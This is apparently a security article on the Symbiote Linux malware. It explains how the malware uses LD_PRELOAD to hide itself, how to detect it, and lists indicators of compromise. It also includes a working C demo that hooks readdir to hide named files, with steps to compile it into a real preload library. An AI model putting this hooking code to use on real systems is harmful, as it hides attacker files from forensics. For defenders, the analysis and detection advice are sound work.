June 6, 2023

A recently discovered form of malware that infects Linux systems uses sophisticated techniques to hide itself and steal credentials.

The previously undetected “Symbiote” malware is parasitic in nature: it cannot run on its own and must infect other running processes in order to do damage on a compromised machine.

Symbiote is not a standalone executable that is run to infect a machine; it is a shared object library that gets loaded into every running process, and that is how the machine becomes infected.

Once Symbiote has been loaded into all running processes, it gives the attacker rootkit functionality, the ability to harvest credentials, and remote access to the machine.

Symbiote, first detected in November 2021, was initially written to target the financial sector in Latin America. Once it is in place, it hides any other malware the attacker deploys, making infections hard to detect. Hard may be an understatement: according to the researchers, live forensics on an infected machine may turn up nothing, since all of the malware's files, processes, and network artifacts are hidden.

Malware targeting Linux systems is not new, but the stealth techniques used by Symbiote make it stand out. The dynamic linker loads the malware via LD_PRELOAD, so it enters each process ahead of libc and every other shared object the program depends on. Because it is loaded first, its exported functions win symbol resolution over the same-named functions in the libraries loaded after it: the malware can “hijack the imports” of the application, so that a call meant for a libc function lands in Symbiote's copy, which can filter the real result before handing it back to the caller. Symbiote uses this to hide its own files, processes, and network activity on the machine.

Detecting an infection at the rootkit level is difficult. Network telemetry can be used to detect anomalous DNS requests, and security tools such as antivirus and endpoint detection and response agents should be statically linked to ensure they are not themselves “infected” by userland rootkits. A statically linked binary never invokes the dynamic linker, so LD_PRELOAD has no effect on it, and it issues its own system calls rather than going through a libc whose functions may have been hijacked; comparing what a statically linked tool sees with what a dynamically linked one reports is a practical way to spot a userland rootkit.
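To make the import hijacking and the static-linking advice concrete, here is an added C example written for this page; it is not Symbiote's code and not code from the researchers' report. It interposes libc's readdir so that directory entries on a hide list are dropped, then reads the same directory twice: once through libc, which passes through the hook, and once through the raw getdents64 system call, which is the path a statically linked tool takes and which the hook cannot reach. The hide list, the temporary directory under /tmp and the file names in it are constructed for the demo (two of the names are taken from the hidden-file list further down); it assumes Linux with glibc or musl.

```c
#define _GNU_SOURCE                        /* RTLD_NEXT, syscall(), mkdtemp(), strdup() */
#include <dirent.h>
#include <dlfcn.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>
#ifndef RTLD_NEXT
#define RTLD_NEXT ((void *) -1l)           /* glibc/musl value, in case _GNU_SOURCE came too late */
#endif
#define NAME_LEN 256

/* Constructed hide list; the two names are from the page's "File Names Hidden" list. */
static const char *const hidden_names[] = { "apache2start", "liblinux.so", NULL };

/* 1 if the rootkit would suppress this directory entry. */
int should_hide(const char *name) {
    for (const char *const *p = hidden_names; *p != NULL; p++)
        if (strcmp(name, *p) == 0) return 1;
    return 0;
}

/* Interposed readdir(). In a preloaded shared object this exported symbol resolves before
 * libc's, so every dynamically linked program calls it; the genuine function is fetched
 * with dlsym(RTLD_NEXT). Defining it in the executable interposes the same way here. */
struct dirent *readdir(DIR *dirp) {
    static struct dirent *(*real_readdir)(DIR *) = NULL;
    struct dirent *entry;
    if (real_readdir == NULL)
        *(void **) &real_readdir = dlsym(RTLD_NEXT, "readdir");
    while ((entry = real_readdir(dirp)) != NULL && should_hide(entry->d_name))
        ;                                  /* swallow hidden entries; the caller never sees them */
    return entry;
}

/* Listing through libc: what a dynamically linked ls, find or EDR agent gets. */
int list_via_libc(const char *path, char out[][NAME_LEN], int max) {
    DIR *dp = opendir(path);
    struct dirent *entry;
    int n = 0;
    if (dp == NULL) return -1;
    while ((entry = readdir(dp)) != NULL)  /* binds to the hook above */
        if (n < max) snprintf(out[n++], NAME_LEN, "%s", entry->d_name);
    closedir(dp);
    return n;
}

struct linux_dirent64 {                    /* kernel record layout; glibc does not export it */
    unsigned long long d_ino; long long d_off; unsigned short d_reclen;
    unsigned char d_type; char d_name[];
};

/* Listing through the raw getdents64 syscall, bypassing libc: the statically linked tool's view. */
int list_via_syscall(const char *path, char out[][NAME_LEN], int max) {
    char buf[4096] __attribute__((aligned(8)));
    int fd = open(path, O_RDONLY | O_DIRECTORY);
    int n = 0;
    if (fd < 0) return -1;
    for (long nread; (nread = syscall(SYS_getdents64, fd, buf, sizeof buf)) > 0;) {
        for (long pos = 0; pos < nread;) {
            struct linux_dirent64 *d = (struct linux_dirent64 *) (buf + pos);
            if (n < max) snprintf(out[n++], NAME_LEN, "%s", d->d_name);
            pos += d->d_reclen;
        }
    }
    close(fd);
    return n;
}

int contains(char names[][NAME_LEN], int n, const char *want) {
    for (int i = 0; i < n; i++)
        if (strcmp(names[i], want) == 0) return 1;
    return 0;
}

/* Constructed fixture: temp directory with one hidden and one ordinary empty file; malloc'd path or NULL. */
char *make_demo_dir(void) {
    static const char *const files[] = { "apache2start", "notes.txt", NULL };
    char *dir = strdup("/tmp/preload-demo-XXXXXX"), p[NAME_LEN + 64];
    if (dir == NULL) return NULL;
    if (mkdtemp(dir) == NULL) { free(dir); return NULL; }
    for (const char *const *f = files; *f != NULL; f++) {
        snprintf(p, sizeof p, "%s/%s", dir, *f);
        int fd = open(p, O_WRONLY | O_CREAT, 0600);
        if (fd >= 0) close(fd);
    }
    return dir;
}

void remove_demo_dir(char *dir) {          /* undo make_demo_dir() */
    char p[NAME_LEN + 64];
    snprintf(p, sizeof p, "%s/apache2start", dir); unlink(p);
    snprintf(p, sizeof p, "%s/notes.txt", dir);    unlink(p);
    rmdir(dir); free(dir);
}

int main(void) {
    char lv[16][NAME_LEN], rv[16][NAME_LEN], *dir = make_demo_dir();
    if (dir == NULL) return 1;
    int nl = list_via_libc(dir, lv, 16), nr = list_via_syscall(dir, rv, 16);
    printf("apache2start via libc: %s, via raw syscall: %s (%d vs %d entries)\n",
           contains(lv, nl, "apache2start") ? "yes" : "no", contains(rv, nr, "apache2start") ? "yes" : "no", nl, nr);
    remove_demo_dir(dir);
    return 0;
}
```

Build with gcc demo.c -o demo (add -ldl on glibc older than 2.34) and run it: the libc listing omits apache2start while the getdents64 listing shows it, which is exactly the discrepancy a statically linked scanner would surface against a hooked libc. To turn the hook into a real preload library, compile only should_hide and readdir with -shared -fPIC and point LD_PRELOAD at the result; any dynamically linked program started under it will then fail to list the hidden names.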

Indicators of Compromise

  • 121157e0fcb728eb8a23b55457e89d45d76aa3b7d01d3d49105890a00662c924
  • f55af21f69a183fb8550ac60f392b05df14aa01d7ffe9f28bc48a118dc110b4c
  • ec67bbdf55d3679fca72d3c814186ff4646dd779a862999c82c6faa8e6615180
  • a0cd554c35dee3fed3d1607dc18debd1296faaee29b5bd77ff83ab6956a6f9d6
  • 45eacba032367db7f3b031e5d9df10b30d01664f24da6847322f6af1fd8e7f01

Ports Hidden

  • 45345
  • 34535
  • 64543
  • 24645
  • 47623
  • 62537
  • 43253
  • 43753
  • 63424
  • 26424

Domains Hidden

  • assets[.]fans
  • caixa[.]cx
  • dpf[.]fm
  • bancodobrasil[.]dev
  • cctdcapllx0520
  • cctdcapllx0520[.]df[.]caixa
  • webfirewall[.]caixa[.]wf
  • caixa[.]wf

Process Names Hidden

  • javaserverx64
  • javaclientex64
  • javanodex86
  • apache2start
  • apache2stop
  • [watchdog/0]
  • certbotx64
  • certbotx86
  • javautils

File Names Hidden

  • apache2start
  • apache2stop
  • profiles.php
  • 404erro.php
  • javaserverx64
  • javaclientex64
  • javanodex86
  • liblinux.so
  • java.h
  • open.h
  • mpt86.h
  • sqlsearch.php
  • indexq.php
  • mt64.so
  • certbot.h
  • cert.h
  • certbotx64
  • certbotx86
  • javautils
  • search.so

Credential Exfil Domains

  • *.x3206.caixa.cx
  • *.dev21.bancodobrasil.dev
